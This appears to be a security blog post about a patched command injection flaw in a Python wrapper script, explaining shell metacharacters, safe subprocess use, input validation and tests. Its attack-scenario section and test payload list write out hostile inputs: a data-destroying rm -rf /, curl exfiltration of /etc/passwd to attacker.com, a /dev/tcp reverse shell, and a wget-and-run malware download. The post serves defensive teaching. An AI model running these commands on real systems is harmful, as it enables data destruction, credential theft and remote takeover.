Back to Blog
critical SEVERITY6 min read

Critical Command Injection Flaw Fixed in Python CLI Script

A critical command injection vulnerability in a Python script that wraps a C/C++ binary has been patched. The flaw allowed attackers to execute arbitrary commands by injecting shell metacharacters into unsanitized input, potentially compromising entire systems. This fix demonstrates why proper subprocess handling is essential for secure Python development.

O
By orbisai0security
April 3, 2026
#security#command-injection#python#subprocess#shell-injection#critical-vulnerability#secure-coding

Introduction

Command injection vulnerabilities remain one of the most dangerous security flaws in modern software development. Despite being well-documented for decades, they continue to appear in production code, often with devastating consequences. Today, we're examining a critical command injection vulnerability (V-006) that was recently discovered and fixed in a Python CLI script that serves as a wrapper for a compiled binary.

This vulnerability highlights a common pitfall: developers creating Python scripts that invoke native binaries without properly sanitizing user input. If you've ever written a Python script that calls external commands, this post is essential reading.

The Vulnerability Explained

What Is Command Injection?

Command injection occurs when an application passes unsanitized user input to a system shell. The vulnerability in question existed in website/fetch_github_stars.py at line 179, where the script invoked a compiled C/C++ hyphen binary using unsafe subprocess methods.

The Technical Problem

The vulnerable code likely used one of these dangerous patterns:

# DANGEROUS PATTERN 1: os.system()
import os
user_input = get_user_input()
os.system(f"./hyphen {user_input}")

# DANGEROUS PATTERN 2: subprocess with shell=True
import subprocess
subprocess.call(f"./hyphen {user_input}", shell=True)

When shell=True is used or when os.system() is called, Python invokes the command through the system shell (/bin/sh on Unix systems). The shell interprets special characters called metacharacters, including:

  • ; - Command separator
  • | - Pipe operator
  • & - Background execution
  • $() - Command substitution
  • ` - Command substitution (backticks)
  • > and < - Redirection operators

Real-World Attack Scenario

Let's say the script accepts a repository name as input to fetch GitHub stars. An attacker could exploit this vulnerability like so:

Intended use:

python fetch_github_stars.py "myrepo"
# Executes: ./hyphen myrepo

Malicious exploitation:

python fetch_github_stars.py "myrepo; rm -rf /"
# Executes: ./hyphen myrepo; rm -rf /

Even more insidiously, an attacker could:

# Exfiltrate sensitive data
python fetch_github_stars.py "myrepo; cat /etc/passwd | curl -X POST https://attacker.com"

# Establish a reverse shell
python fetch_github_stars.py "myrepo & bash -i >& /dev/tcp/attacker.com/4444 0>&1"

# Install malware
python fetch_github_stars.py "myrepo; wget https://malware.com/payload.sh && bash payload.sh"

Impact Assessment

This is rated as CRITICAL severity because:

  1. Arbitrary Command Execution: Attackers can run any command with the privileges of the Python process
  2. System Compromise: Full system takeover is possible if the script runs with elevated privileges
  3. Data Exfiltration: Sensitive data can be stolen from the server
  4. Lateral Movement: Compromised systems can be used to attack other infrastructure
  5. Supply Chain Risk: If this script is part of a build process, it could compromise software distribution

The Fix

Secure Implementation

The fix involves replacing unsafe subprocess calls with properly sanitized alternatives. Here's how to do it correctly:

BEFORE (Vulnerable):

import os

def fetch_stars(repo_name):
    # DANGEROUS: Shell interprets metacharacters
    os.system(f"./hyphen --repo {repo_name}")

AFTER (Secure):

import subprocess

def fetch_stars(repo_name):
    # SAFE: Arguments passed as list, no shell interpretation
    subprocess.run(["./hyphen", "--repo", repo_name], 
                   shell=False,
                   check=True)

Why This Works

The secure version uses these critical protections:

  1. Array-based arguments: By passing arguments as a list ["./hyphen", "--repo", repo_name], Python directly executes the binary without invoking a shell

  2. shell=False: Explicitly disables shell interpretation (this is the default, but being explicit is good practice)

  3. check=True: Raises an exception if the command fails, preventing silent failures

  4. No string interpolation: Arguments are separate list elements, preventing injection

Additional Hardening

For maximum security, the fix should also include:

import subprocess
import shlex
import re

def fetch_stars(repo_name):
    # Validate input format (alphanumeric, hyphens, underscores only)
    if not re.match(r'^[a-zA-Z0-9_-]+$', repo_name):
        raise ValueError("Invalid repository name format")

    # Use subprocess.run with list arguments
    try:
        result = subprocess.run(
            ["./hyphen", "--repo", repo_name],
            shell=False,
            check=True,
            capture_output=True,
            text=True,
            timeout=30  # Prevent hanging
        )
        return result.stdout
    except subprocess.CalledProcessError as e:
        # Handle errors appropriately
        logging.error(f"Command failed: {e}")
        raise

Prevention & Best Practices

1. Never Use shell=True with User Input

This is the golden rule. If you must use shell=True (which should be rare), never include user-controlled data.

# NEVER DO THIS
subprocess.run(f"command {user_input}", shell=True)

# ALWAYS DO THIS
subprocess.run(["command", user_input], shell=False)

2. Input Validation is Your Second Line of Defense

Always validate and sanitize input before using it:

import re

def validate_repo_name(name):
    """Only allow alphanumeric characters, hyphens, and underscores"""
    if not re.match(r'^[a-zA-Z0-9_-]{1,100}$', name):
        raise ValueError("Invalid repository name")
    return name

3. Use Allowlists, Not Denylists

Don't try to filter out dangerous characters—define what IS allowed:

# BAD: Trying to blacklist dangerous characters (incomplete)
dangerous = [';', '|', '&', '$', '`']
if any(char in user_input for char in dangerous):
    raise ValueError("Invalid input")

# GOOD: Whitelist allowed characters
if not all(c.isalnum() or c in '-_' for c in user_input):
    raise ValueError("Invalid input")

4. Principle of Least Privilege

Run scripts with minimal necessary permissions:

# Run as non-privileged user
sudo -u limited_user python fetch_github_stars.py

# Use containers to isolate
docker run --read-only --user 1000:1000 app python script.py

5. Static Analysis Tools

Use security scanners to detect these issues:

  • Bandit: Python security linter that detects shell=True usage
    bash pip install bandit bandit -r . -f json -o security_report.json

  • Semgrep: Pattern-based code scanner
    bash semgrep --config=p/python website/

  • CodeQL: Advanced semantic code analysis

6. Security Standards Reference

This vulnerability maps to:

  • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
  • OWASP Top 10 2021: A03:2021 – Injection
  • MITRE ATT&CK: T1059 - Command and Scripting Interpreter

7. Code Review Checklist

When reviewing Python code that executes external commands:

  • [ ] Are arguments passed as a list instead of a string?
  • [ ] Is shell=False (or omitted, as it's the default)?
  • [ ] Is user input validated with a strict allowlist?
  • [ ] Are there timeouts to prevent hanging?
  • [ ] Are errors handled securely without exposing system details?
  • [ ] Does the process run with minimal privileges?

Testing for Command Injection

Manual Testing

Test with these payloads:

test_payloads = [
    "valid_input",
    "valid-input",
    "valid_input123",
    "; ls -la",
    "| cat /etc/passwd",
    "& whoami",
    "$(curl attacker.com)",
    "`id`",
    "input\nwhoami",
    "input && cat /etc/shadow"
]

for payload in test_payloads:
    try:
        fetch_stars(payload)
        print(f"Payload accepted: {payload}")
    except ValueError:
        print(f"Payload rejected: {payload}")

Automated Testing

Create security test cases:

import unittest

class TestCommandInjectionPrevention(unittest.TestCase):
    def test_rejects_semicolon(self):
        with self.assertRaises(ValueError):
            fetch_stars("repo; rm -rf /")

    def test_rejects_pipe(self):
        with self.assertRaises(ValueError):
            fetch_stars("repo | cat /etc/passwd")

    def test_accepts_valid_input(self):
        result = fetch_stars("valid-repo-name")
        self.assertIsNotNone(result)

Conclusion

Command injection vulnerabilities represent a critical security risk that can lead to complete system compromise. The fix applied to fetch_github_stars.py demonstrates the importance of:

  1. Using subprocess correctly: Always pass arguments as lists with shell=False
  2. Validating input: Implement strict allowlists for user-provided data
  3. Defense in depth: Combine multiple security layers
  4. Automated scanning: Use tools like Bandit and Semgrep to catch issues early

Remember: Every time you invoke an external command with user input, you're creating a potential security boundary. Treat it with the respect it deserves.

Key Takeaways

  • Never use os.system() or subprocess with shell=True when handling user input
  • Always pass command arguments as lists, not concatenated strings
  • Validate input with strict allowlists, not denylists
  • Use static analysis tools to detect these vulnerabilities before they reach production
  • Apply the principle of least privilege to minimize damage from successful exploits

The security community continues to see command injection vulnerabilities in production systems. By following these best practices and learning from fixes like this one, we can collectively improve the security posture of our applications.

Stay secure, validate everything, and never trust user input.

For more information on command injection prevention, visit the OWASP Command Injection Prevention Cheat Sheet.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #3007
View Repository →

Related Articles

critical

Stack Buffer Overflow in MapScale: How Five Unsafe sprintf Calls Created a Critical Vulnerability

A critical stack-based buffer overflow vulnerability was discovered and patched in `src/mapscale.c`, where five unbounded `sprintf` calls wrote formatted output into fixed-size stack buffers without any bounds checking. An attacker controlling unit text strings could overflow the stack buffer, potentially overwriting the function return address and achieving arbitrary code execution. The fix replaces dangerous `sprintf` calls with their bounds-checked counterparts, eliminating the overflow risk

critical

Heap Buffer Overflows in YAML Parser: How Unchecked memcpy Calls Create Critical Attack Vectors

A critical heap buffer overflow vulnerability was discovered and patched in the YAML parser embedded within an Android VPN application, where five unvalidated `memcpy` calls could allow an attacker to corrupt heap memory by supplying a crafted YAML configuration file. This class of vulnerability is particularly dangerous because it can lead to arbitrary code execution or application crashes in security-sensitive contexts. The fix adds proper bounds validation before each copy operation, eliminat

critical

Critical Buffer Overflow Fixed: When "Safe" Functions Aren't Safe

A critical vulnerability in DeepSkyStackerKernel's StackWalker.cpp was silently replacing bounds-checking string functions with their unsafe counterparts via preprocessor macros, exposing the entire codebase to buffer overflow attacks. This fix removes the dangerous macro definitions that discarded buffer size arguments, restoring the intended memory safety protections across all call sites. Understanding how this subtle macro trick works is essential for any C/C++ developer working with string